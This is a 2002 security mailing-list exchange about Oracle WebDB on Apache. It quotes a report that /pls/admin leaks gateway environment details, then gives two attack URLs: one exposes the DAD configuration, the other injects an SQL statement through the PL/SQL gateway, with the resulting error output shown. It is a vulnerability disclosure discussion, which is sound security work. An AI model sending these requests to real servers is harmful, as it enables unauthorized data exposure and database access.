>While I was going through the Oracle Apache+WebDB vulnerability, I found
>something else also
>interesting, I don't know if anyone has posted this before, but here it
goes
>any way.
>If you reques the following: http://<hostname>:<port>/pls/admin
>The following info is displayed:
>Sun, 3 Feb 2002 19:57:12 GMT
>No DAD configuration Found
> DAD name:
> PROCEDURE :
> URL : http://<hostname>:<port>/pls/admin
> PARAMETERS :
> ===========
>
> ENVIRONMENT:
> ============
> PLSQL_GATEWAY=WebDb
> GATEWAY_IVERSION=2
> SERVER_SOFTWARE=Apache/1.3.12 (Unix) ApacheJServ/1.1 mod_perl/1.22
[CUT...]
Hi
Yes, Michal Zalewski has posted this bug.
http://www.securityfocus.com/archive/1/153186
There are 2 bug for Web DB.
1) you can "view" the DAD configuration on the Database server:
http://<host>/pls/<name_of_dad>/admin_/gateway.htm
2) the oracle webdb accept a PL-SQL procedure on the web, for example if you
write in the browser:
http://<hostname>:<port>/pls/<name_of_dad>/select%09*%09from%09cat%01 the
following info is displayed:
ORA-06550 row 7
PLS-00428 A INTO clause waited in this instruction .. (sorry i have webdb in
italian and i translate word by word)
PL/SQL: SQL statement ignored
hope this help
Marzio Scalise
Information Risk Management
KPMG S.p.A.
pgp key is available at:
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x606359A9
**************************************************************************
The information in this email is confidential and may be legally
privileged.
It is intended solely for the addressee. Access to this email by
anyone else is unauthorized.
If you are not the intended recipient, any disclosure, copying,
distribution or any action taken or omitted to be taken in reliance
on it, is prohibited and may be unlawful. When addressed to
our clients any opinions or advice contained in this email are
subject to the terms and conditions expressed in the governing
KPMG client engagement letter.
**************************************************************************
Received on Feb 04 2002
Intro
